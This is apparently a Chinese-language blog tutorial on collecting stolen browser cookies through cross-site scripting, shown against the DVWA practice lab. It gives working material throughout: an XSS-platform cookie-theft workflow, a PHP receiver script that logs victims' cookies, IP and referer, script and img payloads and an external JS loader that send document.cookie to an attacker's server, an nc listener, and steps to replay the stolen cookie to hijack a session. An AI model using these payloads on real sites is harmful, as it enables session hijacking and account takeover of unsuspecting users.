0x01 前言
最近总结了一下自己接收cookie的方法,和大家分享一下。来源于平时的积累和良师益友的分享。
0x02 进入正题
一:通过XSS平台接收cookie。
这个相信每个人都用过,是大家接收cookie最常用的一种方式。
1.去网上的XSS平台或者自己搭建的XSS平台新建一个项目。
2.在这里我们勾选默认模块,默认模块就是盗取cookie的,然后选择keepsession。
3.然后我们点击下一步,我们“cookie盗取”的项目就创建好了。
4.下面我们便可以将构造好的盗取cookie的payload发送给受害者,这里我们用DVWA做测试。我们可以直接使用XSS平台的payload,也可以自行构造payload。在这里我们直接使用XSS平台的payload。
5.查看我们接收到的cookie。
6.cookie利用。
方法一:利用火狐插件"tamper data",将我们抓取的cookie添加进去。
点击OK,登录成功。
方法二:使用F12调试调试工具,找到我们的cookie,将cookie替换为我们抓取到的cookie。
再次访问“127.0.0.1/dvwa/”,即可登陆成功。
二:通过PHP页面接收cookie。
大家可以把接收cookie的PHP页面放到自己的vps上,这种方法用来接收用户cookie也是非常好用的。
1.在自己LAMP环境的vps上新建一个名为receive.php的页面,键入以下代码接收cookie。
<?php
$cookie=$_GET['cookie'];
$ip=getenv('REMOTE_ADDR');
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$rec=fopen('cookie.txt','a');
fwrite($rec,"IP:".$ip."| time:".$time."| referer:".$referer."| cookie:".$cookie."\n");
fclose($rec);
?>
接下来我们就需要构造可以发送用户cookie到我们vps的payload。这里有以下2种方法。
方法一:直接利用script和img标签构造发送cookie的payload。
这种方法构造的payload较长。在DVWA有对输入字符长度的限制,这里我们可以通过审查元素绕过。
<script>document.write('<img src="http://vps/receive.php?cookie='+document.cookie+'" />')</script>
添加成功后,在我们vps中receive.php所在页面生成了一个名为cookie.txt的文件,盗取用户的cookie就被保存在这个文件中。
方法二:加载外部JS文件盗取cookie。
这样我们可以将更多的XSS代码放到外部的JS文件中,非常方便。这样也可以减小我们输入字符的长度。
<script src="http://vps/xss.js"></script>
xss.js文件内容:
new Image().src="http://vps/receive.php?cookie="+document.cookie;
接下来我们将payload插入到DVWA中。
插入成功后,同样在我们的cookie.txt中接收到了用户的cookie。
三:通过nc接收用户cookie。
1.构造插入到DVWA中的payload:
<script>document.write('<img src="http://vps/?'+document.cookie+'" />')</script>
2.在自己的vps中监听本地80端口(如果想从别的端口监听,需要在payload中vps地址后面加上指定的端口号)。
命令:nc -lvp 80
3.将我们的payload插入到DVWA中,成功监听到用户的cookie。
0x03 后记
本文所介绍的内容都比较基础,主要是想和大家分享一下,还有许多我不知道的接收cookie的方法,希望能和大家一起交流补充,谢谢。
1109
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
